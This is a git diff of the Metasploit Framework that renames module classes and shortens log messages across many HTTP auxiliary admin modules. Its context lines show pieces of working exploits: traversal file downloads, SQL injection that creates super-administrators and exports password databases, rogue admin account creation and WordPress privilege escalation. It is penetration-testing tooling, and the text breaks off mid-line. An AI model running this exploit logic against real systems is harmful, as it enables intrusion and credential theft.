#{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or is empty.") + print_error("0 bytes returned, file does not exist or is empty.") return end @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5fa29d0f9c..032c4d5db7 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary def run unless check == Exploit::CheckCode::Appears - print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + print_error("Fingerprint hasn't been successful, trying to exploit anyway...") end version = get_version @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary creds = inject_sql(version < 7000 ? true : false) username = creds[0] password = creds[1] - print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + print_good("Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) @@ -241,10 +241,10 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_status("#{peer} - Reporting Super Administrator credentials...") + print_status("Reporting Super Administrator credentials...") report_super_admin_creds(username, password) - print_status("#{peer} - Leaking Password database...") + print_status("Leaking Password database...") loot_passwords(cookie_su) end @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + print_good("Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' loot_type = 'text/csv' loot_filename = 'manageengine_pmp_password_db.csv' @@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary res.body, loot_filename, loot_desc) - print_status("#{peer} - Password database saved in: #{p}") + print_status("Password database saved in: #{p}") else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") + print_error("Failed to export Password Manager Pro passwords.") end end end diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 23df8b7b73..1fbc3bcf01 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Copying file to Web location...") + print_status("Copying file to Web location...") dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" res = send_request_cgi( @@ -86,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} copied to #{dst_path} successfully") + print_good("File #{file} copied to #{dst_path} successfully") else - print_error("#{peer} - Failed to copy #{file} to #{dst_path}") + print_error("Failed to copy #{file} to #{dst_path}") end - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -101,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end # Cleanup @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 8e147f4927..43936f647b 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -46,21 +46,21 @@ class Metasploit3 < Msf::Auxiliary def run # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'), 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }, }) rescue Rex::ConnectionError - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end # Show data if needed if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") + print_error("0 bytes returned, file does not exist or it is empty.") return end vprint_line(res.body.to_s) @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index 0e78a31723..0d4f97095a 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Authenticated File Download', 'Description' => %q{ - Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. - The application has a file download vulnerability that can be exploited by an - authenticated remote attacker to download any file in the system.. - This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file download vulnerability that can be exploited by an + authenticated remote attacker to download any file in the system.. + This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ @@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary [ ['CVE', '2016-1524'], ['US-CERT-VU', '777024'], - ['URL', 'TODO_GITHUB_URL'], - ['URL', 'TODO_FULLDISC_URL'] + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DisclosureDate' => 'Feb 4 2016')) @@ -41,6 +41,11 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']), OptString.new('FILEPATH', [false, 'Path of the file to download minus the drive letter', '/Windows/System32/calc.exe']), ], self.class) + + register_advanced_options( + [ + OptInt.new('DEPTH', [false, 'Max depth to traverse', 15]) + ], self.class) end def authenticate @@ -146,16 +151,48 @@ class Metasploit3 < Msf::Auxiliary print_good("File saved in: #{path}") end + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: 'netgear', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + last_attempted_at: DateTime.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + def run cookie = authenticate if cookie == nil fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.") else - print_good("#{peer} - Logged with successfully.") + print_good("#{peer} - Logged in with #{datastore['USERNAME']}:#{datastore['PASSWORD']} successfully.") + report_cred( + user: datastore['USERNAME'], + password: datastore['PASSWORD'], + proof: cookie + ) end - if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty? + if datastore['FILEPATH'].blank? fail_with(Failure::Unknown, "#{peer} - Please supply the path of the file you want to download.") return end @@ -171,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary print_error("#{peer} - File not found, using bruteforce to attempt to download the file") count = 1 - while count < 15 + while count < datastore['DEPTH'] res = download_file(("../" * count).chomp('/') + filepath, cookie) if res && res.code == 200 if res.body.to_s.bytesize != 0 && (not res.body.to_s =~/This file does not exist./) && (not res.body.to_s =~/operation is failed/) diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index 9158af9b7e..311355c401 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -44,16 +44,16 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to access the configuration of the device") + print_status("Trying to access the configuration of the device") # extract device details action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' - print_status("#{peer} - Extracting Firmware version...") + print_status("Extracting Firmware version...") extract_data(action) # extract credentials action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo' - print_status("#{peer} - Extracting credentials...") + print_status("Extracting credentials...") extract_data(action) end @@ -75,26 +75,26 @@ class Metasploit3 < Msf::Auxiliary return if res.headers['Server'] !~ /Linux\/2.6.15 uhttpd\/1.0.0 soap\/1.0/ if res.body =~ /(.*)<\/NewPassword>/ - print_status("#{peer} - Credentials found, extracting...") + print_status("Credentials found, extracting...") extract_credentials(res.body) end if res.body =~ /(.*)<\/ModelName>/ model_name = $1 - print_good("#{peer} - Model #{model_name} found") + print_good("Model #{model_name} found") end if res.body =~ /(.*)<\/Firmwareversion>/ firmware_version = $1 - print_good("#{peer} - Firmware version #{firmware_version} found") + print_good("Firmware version #{firmware_version} found") #store all details as loot loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body) - print_good("#{peer} - Device details downloaded to: #{loot}") + print_good("Device details downloaded to: #{loot}") end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary body.each_line do |line| if line =~ /(.*)<\/NewPassword>/ pass = $1 - print_good("#{peer} - admin / #{pass} credentials found") + print_good("admin / #{pass} credentials found") service_data = { address: rhost, @@ -137,6 +137,6 @@ class Metasploit3 < Msf::Auxiliary # store all details as loot loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body) - print_good("#{peer} - Account details downloaded to: #{loot}") + print_good("Account details downloaded to: #{loot}") end end diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index 773973688e..c0636e47c6 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rapid7/nexpose' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 8a7c25a70e..166c1ddaad 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Trying to delete #{datastore['RPATH']}...") + print_status("Trying to delete #{datastore['RPATH']}...") res = send_request_cgi( { @@ -57,9 +57,9 @@ class Metasploit3 < Msf::Auxiliary }, 5) if res and res.code == 200 and res.body =~ /1<\/VERSION>0<\/STATUS>0<\/TRANSID><\/RESULT>/ - print_good("#{peer} - File #{datastore['RPATH']} successfully deleted") + print_good("File #{datastore['RPATH']} successfully deleted") else - print_error("#{peer} - File not deleted") + print_error("File not deleted") end end diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 8f7bacd0cf..b07c68631f 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 991b706893..52911870ca 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/element' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index 4f7a947b08..01194f368d 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index d95a6c2802..8162fb9b44 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << file travs << "%00" - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") + print_status("Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") if is_proficy? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found") + print_error("Sophos Web Protect Appliance vulnerable component not found") return end contents = read_file(datastore['FILEPATH']) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index be790a49dd..78a9a2cee8 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.code == 200 && res.body.to_s =~ /Error while creating account/ # No way to know whether this worked or not, it always says error - print_status("#{peer} - The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") + print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") service_data = { address: rhost, port: rport, @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) else - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end end end diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index e11ccfc8ae..00ebbc8800 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end def get_traversal_path - print_status("#{peer} - Trying to find out the traversal path...") + print_status("Trying to find out the traversal path...") large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary }, }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.') end - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/ file_path = $3 else @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary traversal_path = get_traversal_path if traversal_path.nil? - print_error("#{peer} - Could not get traversal path, using bruteforce to download the file") + print_error("Could not get traversal path, using bruteforce to download the file") count = 1 while count < 15 res = download_file(('../' * count) + file_path) diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 7a219171e5..38d7e8b2a8 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end - print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") + print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index b987960189..a01e9ce969 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index ae1f0a6a32..bbe5f28383 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 5e5043da0e..043fb814b9 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index dd8fb6ca8c..89ab23faa7 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 3e43c502d6..90f8a5105c 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 69db942e3a..1958ef82f4 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'thread' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index e908b1bd14..596d5a0806 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index b9efc4ae7f..93b7c1351b 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -79,11 +79,11 @@ class Metasploit3 < Msf::Auxiliary def run if user == pass - print_error("#{peer} - Please select a password different than the username") + print_error("Please select a password different than the username") return end - print_status("#{peer} - Trying a new admin vBulletin account...") + print_status("Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /Administrator account created/ - print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") + print_good("Admin account with credentials #{user}:#{pass} successfully created") report_cred( ip: rhost, port: rport, @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary proof: res.body ) else - print_error("#{peer} - Admin account creation failed") + print_error("Admin account creation failed") end end end diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index b86b2ee014..46f6a33d20 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Auxiliary username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) - print_status("#{peer} - Trying to get table_prefix") + print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? - print_error("#{peer} - Unable to get table_prefix") + print_error("Unable to get table_prefix") return else - print_status("#{peer} - got table_prefix '#{table_prefix}'") + print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s - print_status("#{peer} - Inserting user #{username} with password #{password}") + print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # login successfull if cookie - print_status("#{peer} - User #{username} with password #{password} successfully created") + print_status("User #{username} with password #{password} successfully created") report_cred( ip: rhost, port: rport, @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary proof: cookie ) else - print_error("#{peer} - User creation failed") + print_error("User creation failed") return end end diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 2a8c26fba6..3897eb9730 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) @@ -65,44 +65,44 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") elsif res.code != 200 - vprint_warning("#{peer} - Server responded with status code #{res.code}") + vprint_warning("Server responded with status code #{res.code}") end res end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) if cookie.nil? - print_error("#{peer} - Failed to authenticate with WordPress") + print_error("Failed to authenticate with WordPress") return end - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? - print_error("#{peer} - Failed to change the admin e-mail address") + print_error("Failed to change the admin e-mail address") return end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? - print_error("#{peer} - Failed to enable user registrations") + print_error("Failed to enable user registrations") return end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? - print_error("#{peer} - Failed to set the default user role") + print_error("Failed to set the default user role") return end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 2fada64417..e60e2c2049 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary def set_wp_option(name, value, cookie) encoded_value = serialize_and_encode(value) if encoded_value.nil? - vprint_error("#{peer} - Failed to serialize #{value}.") + vprint_error("Failed to serialize #{value}.") else res = send_request_cgi( 'method' => 'POST', @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") else - vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_warning("Server responded with status code #{res.code}") if res.code != 200 end return res @@ -97,29 +97,29 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with 